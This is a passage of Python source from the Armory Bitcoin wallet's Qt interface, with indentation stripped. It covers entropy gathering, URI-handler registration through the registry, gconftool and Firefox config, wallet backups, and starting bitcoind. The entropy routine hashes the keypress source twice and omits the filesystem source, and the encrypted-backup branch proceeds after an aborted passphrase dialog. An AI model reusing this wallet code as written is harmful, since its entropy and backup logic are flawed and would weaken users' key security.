# and use a 5-char password, we will still pickup about 40 events.
# Then we throw in the [name,time,size] triplets of some volatile
# system directories, and the hash of a file in that directory that
# is expected to have timestamps and system-dependent parameters.
# Finally, take a desktop screenshot...
# All three of these source are likely to have sufficient entropy alone.
source1,self.entropyAccum = self.entropyAccum,[]
if len(source1)==0:
LOGERROR('Error getting extra entropy from mouse & key presses')
source2 = []
try:
if OS_WINDOWS:
tempDir = os.getenv('TEMP')
extraFiles = []
elif OS_LINUX:
tempDir = '/var/log'
extraFiles = ['/var/log/Xorg.0.log']
elif OS_MACOSX:
tempDir = '/var/log'
extraFiles = ['/var/log/system.log']
# A simple listing of the directory files, sizes and times is good
if os.path.exists(tempDir):
for fname in os.listdir(tempDir):
fullpath = os.path.join(tempDir, fname)
sz = os.path.getsize(fullpath)
tm = os.path.getmtime(fullpath)
source2.append([fname, sz, tm])
# On Linux we also throw in Xorg.0.log
for f in extraFiles:
if os.path.exists(f):
with open(f,'rb') as infile:
source2.append(hash256(infile.read()))
if len(source2)==0:
LOGWARN('Second source of supplemental entropy will be empty')
except:
LOGEXCEPT('Error getting extra entropy from filesystem')
source3 = ''
try:
pixDesk = QPixmap.grabWindow(QApplication.desktop().winId())
pixRaw = QByteArray()
pixBuf = QBuffer(pixRaw)
pixBuf.open(QIODevice.WriteOnly)
pixDesk.save(pixBuf, 'PNG')
source3 = pixBuf.buffer().toHex()
except:
LOGEXCEPT('Third source of entropy (desktop screenshot) failed')
if len(source3)==0:
LOGWARN('Error getting extra entropy from screenshot')
LOGINFO('Adding %d keypress events to the entropy pool', len(source1)/3)
LOGINFO('Adding %s bytes of filesystem data to the entropy pool',
bytesToHumanSize(len(str(source2))))
LOGINFO('Adding %s bytes from desktop screenshot to the entropy pool',
bytesToHumanSize(len(str(source3))/2))
allEntropy = ''.join([str(a) for a in [source1, source1, source3]])
return SecureBinaryData(HMAC256('Armory Entropy', allEntropy))
####################################################
def rescanNextLoad(self):
reply = QMessageBox.warning(self, self.tr('Queue Rescan?'), self.tr(
'The next time you restart Armory, it will rescan the blockchain '
'database, and reconstruct your wallet histories from scratch. '
'The rescan will take 10-60 minutes depending on your system. '
'<br><br> '
'Do you wish to force a rescan on the next Armory restart?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rescan.flag') )
####################################################
def rebuildNextLoad(self):
reply = QMessageBox.warning(self, self.tr('Queue Rebuild?'), self.tr(
'The next time you restart Armory, it will rebuild and rescan '
'the entire blockchain database. This operation can take between '
'30 minutes and 4 hours depending on your system speed. '
'<br><br>'
'Do you wish to force a rebuild on the next Armory restart?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rebuild.flag') )
####################################################
def rescanBalanceNextLoad(self):
reply = QMessageBox.warning(self, self.tr('Queue Balance Rescan?'), self.tr(
'The next time you restart Armory, it will rescan the balance of '
'your wallets. This operation typically takes less than a minute. '
'<br><br>'
'Do you wish to force a balance rescan on the next Armory restart?'), \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rescanbalance.flag') )
####################################################
def loadFailedManyTimesFunc(self, nFail):
"""
For now, if the user is having trouble loading the blockchain, all
we do is delete mempool.bin (which is frequently corrupted but not
detected as such. However, we may expand this in the future, if
it's determined that more-complicated things are necessary.
"""
LOGERROR('%d attempts to load blockchain failed. Remove mempool.bin.' % nFail)
mempoolfile = os.path.join(ARMORY_HOME_DIR,'mempool.bin')
if os.path.exists(mempoolfile):
os.remove(mempoolfile)
else:
LOGERROR('File mempool.bin does not exist. Nothing deleted.')
####################################################
def menuSelectImportKey(self):
QMessageBox.information(self, self.tr('Select Wallet'), self.tr(
'You must import an address into a specific wallet. If '
'you do not want to import the key into any available wallet, '
'it is recommeneded you make a new wallet for this purpose.'
'<br><br>'
'Double-click on the desired wallet from the main window, then '
'click on "Import/Sweep Private Keys" on the bottom-right '
'of the properties window.'
'<br><br>'
'Keys cannot be imported into watching-only wallets, only full '
'wallets.'), QMessageBox.Ok)
####################################################
def menuSelectSweepKey(self):
QMessageBox.information(self, self.tr('Select Wallet'), self.tr(
'You must select a wallet into which funds will be swept. '
'Double-click on the desired wallet from the main window, then '
'click on "Import/Sweep Private Keys" on the bottom-right '
'of the properties window to sweep to that wallet.'
'<br><br>'
'Keys cannot be swept into watching-only wallets, only full '
'wallets.'), QMessageBox.Ok)
####################################################
def changeNumShow(self):
prefWidth = self.numShowOpts[self.comboNumShow.currentIndex()]
if prefWidth=='All':
self.currLedgMin = 1;
self.currLedgMax = self.ledgerSize
self.currLedgWidth = -1;
else:
self.currLedgMax = self.currLedgMin + prefWidth - 1
self.currLedgWidth = prefWidth
self.applyLedgerRange()
####################################################
def clickLedgUp(self):
self.currLedgMin -= self.currLedgWidth
self.currLedgMax -= self.currLedgWidth
self.applyLedgerRange()
####################################################
def clickLedgDn(self):
self.currLedgMin += self.currLedgWidth
self.currLedgMax += self.currLedgWidth
self.applyLedgerRange()
####################################################
def applyLedgerRange(self):
if self.currLedgMin < 1:
toAdd = 1 - self.currLedgMin
self.currLedgMin += toAdd
self.currLedgMax += toAdd
if self.currLedgMax > self.ledgerSize:
toSub = self.currLedgMax - self.ledgerSize
self.currLedgMin -= toSub
self.currLedgMax -= toSub
self.currLedgMin = max(self.currLedgMin, 1)
self.btnLedgUp.setVisible(self.currLedgMin!=1)
self.btnLedgDn.setVisible(self.currLedgMax!=self.ledgerSize)
self.createCombinedLedger()
####################################################
def openSettings(self):
LOGDEBUG('openSettings')
dlgSettings = DlgSettings(self, self)
dlgSettings.exec_()
####################################################
def setupSystemTray(self):
LOGDEBUG('setupSystemTray')
# Creating a QSystemTray
self.sysTray = QSystemTrayIcon(self)
self.sysTray.setIcon( QIcon(self.iconfile) )
self.sysTray.setVisible(True)
self.sysTray.setToolTip('Armory' + (' [Testnet]' if USE_TESTNET else '') + (' [Regtest]' if USE_REGTEST else ''))
self.connect(self.sysTray, SIGNAL('messageClicked()'), self.bringArmoryToFront)
self.connect(self.sysTray, SIGNAL('activated(QSystemTrayIcon::ActivationReason)'), \
self.sysTrayActivated)
menu = QMenu(self)
def traySend():
self.bringArmoryToFront()
self.clickSendBitcoins()
def trayRecv():
self.bringArmoryToFront()
self.clickReceiveCoins()
actShowArmory = self.createAction(self.tr('Show Armory'), self.bringArmoryToFront)
actSendBtc = self.createAction(self.tr('Send Bitcoins'), traySend)
actRcvBtc = self.createAction(self.tr('Receive Bitcoins'), trayRecv)
actClose = self.createAction(self.tr('Quit Armory'), self.closeForReal)
# Create a short menu of options
menu.addAction(actShowArmory)
menu.addAction(actSendBtc)
menu.addAction(actRcvBtc)
menu.addSeparator()
menu.addAction(actClose)
self.sysTray.setContextMenu(menu)
self.notifyQueue = []
self.notifyBlockedUntil = 0
#############################################################################
@AllowAsync
def registerBitcoinWithFF(self):
#the 3 nodes needed to add to register bitcoin as a protocol in FF
rdfschemehandler = 'about=\"urn:scheme:handler:bitcoin\"'
rdfscheme = 'about=\"urn:scheme:bitcoin\"'
rdfexternalApp = 'about=\"urn:scheme:externalApplication:bitcoin\"'
#find mimeTypes.rdf file
rdfs_found = glob.glob(
os.path.join(
os.path.expanduser("~"),
".mozilla",
"firefox",
"*",
"mimeTypes.rdf"
)
)
for rdfs in rdfs_found:
if rdfs:
try:
FFrdf = open(rdfs, 'r+')
except IOError:
continue
ct = FFrdf.readlines()
rdfsch=-1
rdfsc=-1
rdfea=-1
i=0
#look for the nodes
for line in ct:
if rdfschemehandler in line:
rdfsch=i
elif rdfscheme in line:
rdfsc=i
elif rdfexternalApp in line:
rdfea=i
i+=1
#seek to end of file
FFrdf.seek(-11, 2)
i=0;
#add the missing nodes
if rdfsch == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:handler:bitcoin\"\n')
FFrdf.write(' NC:alwaysAsk=\"false\">\n')
FFrdf.write(' <NC:externalApplication RDF:resource=\"urn:scheme:externalApplication:bitcoin\"/>\n')
FFrdf.write(' <NC:possibleApplication RDF:resource=\"urn:handler:local:/usr/bin/xdg-open\"/>\n')
FFrdf.write(' </RDF:Description>\n')
i+=1
if rdfsc == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:bitcoin\"\n')
FFrdf.write(' NC:value=\"bitcoin\">\n')
FFrdf.write(' <NC:handlerProp RDF:resource=\"urn:scheme:handler:bitcoin\"/>\n')
FFrdf.write(' </RDF:Description>\n')
i+=1
if rdfea == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:externalApplication:bitcoin\"\n')
FFrdf.write(' NC:prettyName=\"xdg-open\"\n')
FFrdf.write(' NC:path=\"/usr/bin/xdg-open\" />\n')
i+=1
if i != 0:
FFrdf.write('</RDF:RDF>\n')
FFrdf.close()
#############################################################################
def setupUriRegistration(self, justDoIt=False):
"""
Setup Armory as the default application for handling bitcoin: links
"""
LOGINFO('setupUriRegistration')
if USE_TESTNET or USE_REGTEST:
return
if OS_LINUX:
out,err = execAndWait('gconftool-2 --get /desktop/gnome/url-handlers/bitcoin/command')
out2,err = execAndWait('xdg-mime query default x-scheme-handler/bitcoin')
#check FF protocol association
#checkFF_thread = threading.Thread(target=self.registerBitcoinWithFF)
#checkFF_thread.start()
self.registerBitcoinWithFF(async=True)
def setAsDefault():
LOGINFO('Setting up Armory as default URI handler...')
execAndWait('gconftool-2 -t string -s /desktop/gnome/url-handlers/bitcoin/command "python2 %s \"%%s\""' % __file__)
execAndWait('gconftool-2 -s /desktop/gnome/url-handlers/bitcoin/needs_terminal false -t bool')
execAndWait('gconftool-2 -t bool -s /desktop/gnome/url-handlers/bitcoin/enabled true')
execAndWait('xdg-mime default armory.desktop x-scheme-handler/bitcoin')
if ('no value' in out.lower() or 'no value' in err.lower()) and not 'armory.desktop' in out2.lower():
# Silently add Armory if it's never been set before
setAsDefault()
elif (not 'armory' in out.lower() or not 'armory.desktop' in out2.lower()) and not self.firstLoad:
# If another application has it, ask for permission to change it
# Don't bother the user on the first load with it if verification is
# needed. They have enough to worry about with this weird new program...
if not self.getSettingOrSetDefault('DNAA_DefaultApp', False):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, self.tr('Default URL Handler'),
self.tr('Armory is not set as your default application for handling '
'"bitcoin:" links. Would you like to use Armory as the '
'default?'), self.tr('Do not ask this question again'))
if reply[0]==True:
setAsDefault()
if reply[1]==True:
self.writeSetting('DNAA_DefaultApp', True)
elif OS_WINDOWS:
# Check for existing registration (user first, then root, if necessary)
action = 'DoNothing'
modulepathname = '"'
if getattr(sys, 'frozen', False):
app_dir = os.path.dirname(sys.executable)
app_path = os.path.join(app_dir, sys.executable)
elif __file__:
return #running from a .py script, not gonna register URI on Windows
#justDoIt = True
import ctypes
GetModuleFileNameW = ctypes.windll.kernel32.GetModuleFileNameW
GetModuleFileNameW.restype = ctypes.c_int
app_path = ctypes.create_string_buffer(1024)
rtlength = ctypes.c_int()
rtlength = GetModuleFileNameW(None, ctypes.byref(app_path), 1024)
passstr = str(app_path.raw)
modulepathname += unicode(passstr[0:(rtlength*2)], encoding='utf16') + u'" "%1"'
modulepathname = modulepathname.encode('utf8')
rootKey = 'bitcoin\\shell\\open\\command'
try:
userKey = 'Software\\Classes\\' + rootKey
registryKey = OpenKey(HKEY_CURRENT_USER, userKey, 0, KEY_READ)
val,code = QueryValueEx(registryKey, '')
if 'armory' in val.lower():
if val.lower()==modulepathname.lower():
LOGINFO('Armory already registered for current user. Done!')
return
else:
action = 'DoIt' #armory is registered, but to another path
else:
# Already set to something (at least created, which is enough)
action = 'AskUser'
except:
# No user-key set, check if root-key is set
try:
registryKey = OpenKey(HKEY_CLASSES_ROOT, rootKey, 0, KEY_READ)
val,code = QueryValueEx(registryKey, '')
if 'armory' in val.lower():
LOGINFO('Armory already registered at admin level. Done!')
return
else:
# Root key is set (or at least created, which is enough)
action = 'AskUser'
except:
action = 'DoIt'
dontAsk = self.getSettingOrSetDefault('DNAA_DefaultApp', False)
dontAskDefault = self.getSettingOrSetDefault('AlwaysArmoryURI', False)
if justDoIt:
LOGINFO('URL-register: just doing it')
action = 'DoIt'
elif dontAsk and dontAskDefault:
LOGINFO('URL-register: user wants to do it by default')
action = 'DoIt'
elif action=='AskUser' and not self.firstLoad and not dontAsk:
# If another application has it, ask for permission to change it
# Don't bother the user on the first load with it if verification is
# needed. They have enough to worry about with this weird new program...
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, self.tr('Default URL Handler'),
self.tr('Armory is not set as your default application for handling '
'"bitcoin:" links. Would you like to use Armory as the '
'default?'), self.tr('Do not ask this question again'))
if reply[1]==True:
LOGINFO('URL-register: do not ask again: always %s', str(reply[0]))
self.writeSetting('DNAA_DefaultApp', True)
self.writeSetting('AlwaysArmoryURI', reply[0])
if reply[0]==True:
action = 'DoIt'
else:
LOGINFO('User requested not to use Armory as URI handler')
return
# Finally, do it if we're supposed to!
LOGINFO('URL-register action: %s', action)
if action=='DoIt':
LOGINFO('Registering Armory for current user')
baseDir = os.path.dirname(unicode(passstr[0:(rtlength*2)], encoding='utf16'))
regKeys = []
regKeys.append(['Software\\Classes\\bitcoin', '', 'URL:bitcoin Protocol'])
regKeys.append(['Software\\Classes\\bitcoin', 'URL Protocol', ""])
regKeys.append(['Software\\Classes\\bitcoin\\shell', '', None])
regKeys.append(['Software\\Classes\\bitcoin\\shell\\open', '', None])
for key,name,val in regKeys:
dkey = '%s\\%s' % (key,name)
LOGINFO('\tWriting key: [HKEY_CURRENT_USER\\] ' + dkey)
registryKey = CreateKey(HKEY_CURRENT_USER, key)
SetValueEx(registryKey, name, 0, REG_SZ, val)
CloseKey(registryKey)
regKeysU = []
regKeysU.append(['Software\\Classes\\bitcoin\\shell\\open\\command', '', \
modulepathname])
regKeysU.append(['Software\\Classes\\bitcoin\\DefaultIcon', '', \
'"%s\\armory48x48.ico"' % baseDir])
for key,name,val in regKeysU:
dkey = '%s\\%s' % (key,name)
LOGINFO('\tWriting key: [HKEY_CURRENT_USER\\] ' + dkey)
registryKey = CreateKey(HKEY_CURRENT_USER, key)
#hKey = ctypes.c_int(registryKey.handle)
#ctypes.windll.Advapi32.RegSetValueEx(hKey, None, 0, REG_SZ, val, (len(val)+1))
SetValueEx(registryKey, name, 0, REG_SZ, val)
CloseKey(registryKey)
#############################################################################
def warnNewUSTXFormat(self):
if not self.getSettingOrSetDefault('DNAA_Version092Warn', False):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Warning, self.tr("Version Warning"), self.tr(
'Since Armory version 0.92 the formats for offline transaction '
'operations has changed to accommodate multi-signature '
'transactions. This format is <u>not</u> compatible with '
'versions of Armory before 0.92. '
'<br><br>'
'To continue, the other system will need to be upgraded to '
'to version 0.92 or later. If you cannot upgrade the other '
'system, you will need to reinstall an older version of Armory '
'on this system.'), dnaaMsg=self.tr('Do not show this warning again'))
self.writeSetting('DNAA_Version092Warn', reply[1])
#############################################################################
def execOfflineTx(self):
self.warnNewUSTXFormat()
dlgSelect = DlgOfflineSelect(self, self)
if dlgSelect.exec_():
# If we got here, one of three buttons was clicked.
if dlgSelect.do_create:
DlgSendBitcoins(self.getSelectedWallet(), self, self,
onlyOfflineWallets=True).exec_()
elif dlgSelect.do_broadc:
DlgSignBroadcastOfflineTx(self,self).exec_()
#############################################################################
def sizeHint(self):
return QSize(1000, 650)
#############################################################################
def openToolsDlg(self):
QMessageBox.information(self, self.tr('No Tools Yet!'),
self.tr('The developer tools are not available yet, but will be added '
'soon. Regardless, developer-mode still offers lots of '
'extra information and functionality that is not available in '
'Standard or Advanced mode.'), QMessageBox.Ok)
#############################################################################
def execIntroDialog(self):
if not self.getSettingOrSetDefault('DNAA_IntroDialog', False):
dlg = DlgIntroMessage(self, self)
result = dlg.exec_()
if dlg.chkDnaaIntroDlg.isChecked():
self.writeSetting('DNAA_IntroDialog', True)
if dlg.requestCreate:
self.startWalletWizard()
if dlg.requestImport:
self.execImportWallet()
#############################################################################
def makeWalletCopy(self, parent, wlt, copyType='Same', suffix='', changePass=False):
'''Create a digital backup of your wallet.'''
if changePass:
LOGERROR('Changing password is not implemented yet!')
raise NotImplementedError
# Set the file name.
export_rootpubkey = False
if copyType.lower()=='pkcc':
fn = 'armory_%s.%s' % (wlt.uniqueIDB58, suffix)
export_rootpubkey = True
else:
fn = 'armory_%s_%s.wallet' % (wlt.uniqueIDB58, suffix)
if wlt.watchingOnly and copyType.lower() != 'pkcc':
fn = 'armory_%s_%s_WatchOnly.wallet' % (wlt.uniqueIDB58, suffix)
if export_rootpubkey is True:
savePath = unicode(self.getFileSave(defaultFilename=fn,
ffilter=['Root Pubkey Text Files (*.rootpubkey)']))
else:
savePath = unicode(self.getFileSave(defaultFilename=fn))
if not len(savePath) > 0:
return False
# Create the file based on the type you want.
if copyType.lower()=='same':
wlt.writeFreshWalletFile(savePath)
elif copyType.lower()=='decrypt':
if wlt.useEncryption:
dlg = DlgUnlockWallet(wlt, parent, self, 'Unlock Private Keys')
if not dlg.exec_():
return False
# Wallet should now be unlocked
wlt.makeUnencryptedWalletCopy(savePath)
elif copyType.lower()=='encrypt':
newPassphrase=None
if not wlt.useEncryption:
dlgCrypt = DlgChangePassphrase(parent, self, not wlt.useEncryption)
if not dlgCrypt.exec_():
QMessageBox.information(parent, self.tr('Aborted'), self.tr(
'No passphrase was selected for the encrypted backup. '
'No backup was created.'), QMessageBox.Ok)
newPassphrase = SecureBinaryData(str(dlgCrypt.edtPasswd1.text()))
wlt.makeEncryptedWalletCopy(savePath, newPassphrase)
elif copyType.lower() == 'pkcc':
wlt.writePKCCFile(savePath)
else:
LOGERROR('Invalid "copyType" supplied to makeWalletCopy: %s', copyType)
return False
QMessageBox.information(parent, self.tr('Backup Complete'), self.tr(
'Your wallet was successfully backed up to the following '
'location:<br><br>%1').arg(savePath), QMessageBox.Ok)
return True
#############################################################################
def createAction(self, txt, slot, isCheckable=False, \
ttip=None, iconpath=None, shortcut=None):
"""
Modeled from the "Rapid GUI Programming with Python and Qt" book, page 174
"""
icon = QIcon()
if iconpath:
icon = QIcon(iconpath)
theAction = QAction(icon, txt, self)
if isCheckable:
theAction.setCheckable(True)
self.connect(theAction, SIGNAL('toggled(bool)'), slot)
else:
self.connect(theAction, SIGNAL('triggered()'), slot)
if ttip:
theAction.setToolTip(ttip)
theAction.setStatusTip(ttip)
if shortcut:
theAction.setShortcut(shortcut)
return theAction
#############################################################################
def setUserMode(self, mode):
LOGINFO('Changing usermode:')
LOGINFO(' From: %s', self.settings.get('User_Mode'))
self.usermode = mode
if mode==USERMODE.Standard:
self.writeSetting('User_Mode', 'Standard')
if mode==USERMODE.Advanced:
self.writeSetting('User_Mode', 'Advanced')
if mode==USERMODE.Expert:
self.writeSetting('User_Mode', 'Expert')
LOGINFO(' To: %s', self.settings.get('User_Mode'))
if not self.firstModeSwitch:
QMessageBox.information(self,self.tr('Restart Armory'),
self.tr('You may have to restart Armory for all aspects of '
'the new usermode to go into effect.'), QMessageBox.Ok)
self.firstModeSwitch = False
#############################################################################
def setLang(self, lang):
LOGINFO('Changing language:')
LOGINFO(' From: %s', self.settings.get('Language'))
self.language = lang
self.writeSetting("Language", lang)
LOGINFO(' To: %s', self.settings.get('Language'))
if not self.firstModeSwitch:
QMessageBox.information(self, self.tr('Restart Armory'),
self.tr('You will have to restart Armory for the new language to go into effect'), QMessageBox.Ok)
self.firstModeSwitch = False
#############################################################################
def getPreferredDateFormat(self):
# Treat the format as "binary" to make sure any special symbols don't
# interfere with the SettingsFile symbols
globalDefault = binary_to_hex(DEFAULT_DATE_FORMAT)
fmt = self.getSettingOrSetDefault('DateFormat', globalDefault)
return hex_to_binary(str(fmt)) # short hex strings could look like int()
#############################################################################
def setPreferredDateFormat(self, fmtStr):
# Treat the format as "binary" to make sure any special symbols don't
# interfere with the SettingsFile symbols
try:
unixTimeToFormatStr(1000000000, fmtStr)
except:
QMessageBox.warning(self, self.tr('Invalid Date Format'),
self.tr('The date format you specified was not valid. Please re-enter '
'it using only the strftime symbols shown in the help text.'), QMessageBox.Ok)
return False
self.writeSetting('DateFormat', binary_to_hex(fmtStr))
return True
#############################################################################
def triggerProcessMutexNotification(self, uriLink):
self.bringArmoryToFront()
uriDict = parseBitcoinURI(uriLink)
if len(uriDict) > 0:
self.uriLinkClicked(uriLink)
#############################################################################
def acquireProcessMutex(self):
LOGINFO('acquiring process mutex...')
self.connect(self, SIGNAL("processMutexNotification"), \
self.triggerProcessMutexNotification)
# Prevent Armory from being opened twice
def uriClick_partial(a):
self.emit(SIGNAL("processMutexNotification"), a)
if CLI_OPTIONS.interport > 1:
from armoryengine.ProcessMutex import PySide_ProcessMutex
self.prc_mutex = PySide_ProcessMutex(CLI_OPTIONS.interport, uriClick_partial)
if self.prc_mutex.acquire() == False:
LOGWARN('Socket already occupied! This must be a duplicate Armory')
QMessageBox.warning(self, self.tr('Already Open'), self.tr(
'Armory is already running! You can only have one Armory open '
'at a time. Exiting...'), QMessageBox.Ok)
os._exit(0)
else:
LOGWARN('*** Listening port is disabled. URI-handling will not work')
self.internetStatus = INTERNET_STATUS.DidNotCheck
############################################################################
def startArmoryDBIfNecessary(self):
if CLI_OPTIONS.offline:
LOGWARN("Offline instance, not startig the DB")
return False
try:
if TheBDM.hasRemoteDB() == False:
#check there is no local db
localDBPort = Cpp.BlockDataManagerConfig_hasLocalDB(\
str(ARMORY_HOME_DIR), armoryengine.ArmoryUtils.ARMORYDB_PORT)
if len(localDBPort) > 0:
armoryengine.ArmoryUtils.ARMORYDB_PORT = localDBPort
return True
#look for cookie file and delete it
cookiePath = os.path.join(ARMORY_HOME_DIR, ".cookie_")
if os.path.exists(cookiePath):
os.remove(cookiePath)
#If we got this far, we need to spawn a local db
self.setSatoshiPaths()
TheSDM.spawnDB(str(ARMORY_HOME_DIR), TheBDM.armoryDBDir)
#wait for cookie file creation
while not os.path.exists(cookiePath):
time.sleep(0.1)
#get port from cookie
armoryengine.ArmoryUtils.ARMORYDB_PORT = \
Cpp.BlockDataManagerConfig_getPortFromCookie(str(ARMORY_HOME_DIR))
#test if db has started
if Cpp.BlockDataManagerConfig_testConnection(\
ARMORYDB_IP, armoryengine.ArmoryUtils.ARMORYDB_PORT) == False:
LOGERROR("Failed to spawn ArmoryDB")
return False
LOGINFO("Connecting on port %s" % armoryengine.ArmoryUtils.ARMORYDB_PORT)
else:
LOGWARN("DB is already running")
return True
except Exception as e:
LOGEXCEPT('Failed to start Armory database: %s' % str(e))
return False
############################################################################
def startBitcoindIfNecessary(self):
LOGINFO('startBitcoindIfNecessary')
TheSDM.checkDBIsLocal()
if self.internetStatus == INTERNET_STATUS.Unavailable or \
CLI_OPTIONS.offline:
LOGWARN('Not online, will not start bitcoind')
return False
if TheBDM.hasRemoteDB() or not self.doAutoBitcoind:
return False
if TheSDM.satoshiIsAvailable():
LOGWARN('Tried to start bitcoind, but satoshi already running')
return False
self.setSatoshiPaths()
try:
# "satexe" is actually just the install directory, not the direct
# path the executable. That dir tree will be searched for bitcoind
TheSDM.setupSDM(extraExeSearch=self.satoshiExeSearchPath)
TheSDM.startBitcoind()
LOGDEBUG('Bitcoind started without error')
return True
except:
LOGEXCEPT('Failed to setup SDM')
self.switchNetworkMode(NETWORKMODE.Offline)
############################################################################
def notifyBitcoindIsReady(self):
self.signalExecution.executeMethod(\
self.completeBlockchainProcessingInitialization)
############################################################################
def setSatoshiPaths(self):
LOGINFO('setSatoshiPaths')
# We skip the getSettingOrSetDefault call, because we don't want to set
# it if it doesn't exist
if self.settings.hasSetting('SatoshiExe'):
if not os.path.exists(self.settings.get('SatoshiExe')):
LOGERROR('Bitcoin installation setting is a non-existent directory')
self.satoshiExeSearchPath = [self.settings.get('SatoshiExe')]
else:
self.satoshiExeSearchPath = []
self.satoshiHomePath = BTC_HOME_DIR
if self.settings.hasSetting('SatoshiDatadir'):
# Setting override BTC_HOME_DIR only if it wasn't explicitly
# set as the command line.
manageSatoshi = self.settings.get('ManageSatoshi')
if manageSatoshi == True:
self.satoshiHomePath = str(self.settings.get('SatoshiDatadir'))
LOGINFO('Setting satoshi datadir = %s' % self.satoshiHomePath)
TheBDM.setSatoshiDir(self.satoshiHomePath)
TheSDM.setSatoshiDir(self.satoshiHomePath)
############################################################################
# This version of online mode is possible doesn't check the internet everytime
def isOnlineModePossible(self):
return self.internetStatus != INTERNET_STATUS.Unavailable and \
TheSDM.satoshiIsAvailable() and \
os.path.exists(os.path.join(TheBDM.btcdir, 'blocks'))
############################################################################
def loadBlockchainIfNecessary(self):
LOGINFO('loadBlockchainIfNecessary')
if self.netMode != NETWORKMODE.Offline:
# Track number of times we start loading the blockchain.
# We will decrement the number when loading finishes
# We can use this to detect problems with mempool or blkxxxx.dat
self.numTriesOpen = self.getSettingOrSetDefault('FailedLoadCount', 0)
if self.numTriesOpen>2:
self.loadFailedManyTimesFunc(self.numTriesOpen)
self.settings.set('FailedLoadCount', self.numTriesOpen+1)
try:
TheBDM.goOnline()
self.switchNetworkMode(NETWORKMODE.Full)
except Cpp.NoArmoryDBExcept:
self.switchNetworkMode(NETWORKMODE.Offline)
#############################################################################
def switchNetworkMode(self, newMode):
LOGINFO('Setting netmode: %s', newMode)
self.netMode=newMode
return
#############################################################################
def parseUriLink(self, uriStr, click=True):
if len(uriStr) < 1:
QMessageBox.critical(self, self.tr('No URL String'),
self.tr('You have not entered a URL String yet. '
'Please go back and enter a URL String.'), QMessageBox.Ok)
return {}
LOGINFO('URI link clicked!')
LOGINFO('The following URI string was parsed:')
LOGINFO(uriStr.replace('%','%%'))
try:
uriDict = parseBitcoinURI(uriStr)
except:
# malformed uri, make the dict empty, which will trigger the warning
uriDict = {}
if TheBDM.getState() in (BDM_OFFLINE,BDM_UNINITIALIZED):
LOGERROR('Clicked or entered "bitcoin:" link in offline mode.')
self.bringArmoryToFront()
if click:
QMessageBox.warning(self, self.tr('Offline Mode'),
self.tr('You clicked on a "bitcoin:" link, but Armory is in '
'offline mode, and is not capable of creating transactions. '
'Using links will only work if Armory is connected '
'to the Bitcoin network!'), QMessageBox.Ok)
else:
QMessageBox.warning(self, self.tr('Offline Mode'),
self.tr('You entered a "bitcoin:" link, but Armory is in '
'offline mode, and is not capable of creating transactions. '
'Using links will only work if Armory is connected '
'to the Bitcoin network!'), QMessageBox.Ok)
return {}
if len(uriDict)==0:
if click:
warnMsg = (self.tr('It looks like you just clicked a "bitcoin:" link, but that link is malformed.'))
else:
warnMsg = (self.tr('It looks like you just entered a "bitcoin:" link, but that link is malformed.'))
if self.usermode == USERMODE.Standard:
warnMsg += (self.tr('Please check the source of the link and enter the transaction manually.'))
else:
warnMsg += self.tr('The raw URI string is:\n\n') + uriStr
QMessageBox.warning(self, self.tr('Invalid URI'), warnMsg, QMessageBox.Ok)
LOGERROR(warnMsg.replace('\n', ' '))
return {}
if not uriDict.has_key('address'):
if click:
QMessageBox.warning(self, self.tr('The "bitcoin:" link you just clicked '
'does not even contain an address! There is nothing that '
'Armory can do with this link!'), QMessageBox.Ok)
else:
QMessageBox.warning(self, self.tr('The "bitcoin:" link you just entered '
'does not even contain an address! There is nothing that '
'Armory can do with this link!'), QMessageBox.Ok)
LOGERROR('No address in "bitcoin:" link! Nothing to do!')
return {}
# Verify the URI is for the same network as this Armory instnance
theAddrByte = checkAddrType(base58_to_binary(uriDict['address']))
if theAddrByte!=-1 and not theAddrByte in [ADDRBYTE, P2SHBYTE]:
net = 'Unknown Network'
if NETWORKS.has_key(theAddrByte):
net = NETWORKS[theAddrByte]
if click:
QMessageBox.warning(self, self.tr('Wrong Network!'),
self.tr('The address for the "bitcoin:" link you just clicked is '
'for the wrong network! You are on the <b>%2</b> '
'and the address you supplied is for the '
'<b>%3</b>!').arg(NETWORKS[ADDRBYTE], net), QMessageBox.Ok)
else:
QMessageBox.warning(self, self.tr('Wrong Network!'),
self.tr('The address for the "bitcoin:" link you just entered is '
'for the wrong network! You are on the <b>%2</b> '
'and the address you supplied is for the '
'<b>%3</b>!').arg(NETWORKS[ADDRBYTE], net), QMessageBox.Ok)
LOGERROR('URI link is for the wrong network!')
return {}
# If the URI contains "req-" strings we don't recognize, throw error
recognized = ['address','version','amount','label','message']
for key,value in uriDict.iteritems():
if key.startswith('req-') and not key[4:] in recognized:
if click:
QMessageBox.warning(self, self.tr('Unsupported URI'), self.tr('The "bitcoin:" link '
'you just clicked contains fields that are required but not '
'recognized by Armory. This may be an older version of Armory, '
'or the link you clicked on uses an exotic, unsupported format. '
'<br><br>The action cannot be completed.'''), QMessageBox.Ok)
else:
QMessageBox.warning(self, self.tr('Unsupported URI'), self.tr('The "bitcoin:" link '
'you just entered contains fields that are required but not '
'recognized by Armory. This may be an older version of Armory, '
'or the link you entered on uses an exotic, unsupported format. '
'<br><br>The action cannot be completed.'), QMessageBox.Ok)
LOGERROR('URI link contains unrecognized req- fields.')
return {}
return uriDict
#############################################################################
def uriLinkClicked(self, uriStr):
LOGINFO('uriLinkClicked')
if TheBDM.getState()==BDM_OFFLINE:
QMessageBox.warning(self, self.tr('Offline'),
self.tr('You just clicked on a "bitcoin:" link, but Armory is offline '
'and cannot send transactions. Please click the link '
'again when Armory is online.'), \
QMessageBox.Ok)
return
elif not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
# BDM isnt ready yet, saved URI strings in the delayed URIDict to
# call later through finishLoadBlockChainGUI
qLen = self.delayedURIData['qLen']
self.delayedURIData[qLen] = uriStr
qLen = qLen +1
self.delayedURIData['qLen'] = qLen
return
uriDict = self.parseUriLink(uriStr, self.tr('clicked'))
if len(uriDict)>0:
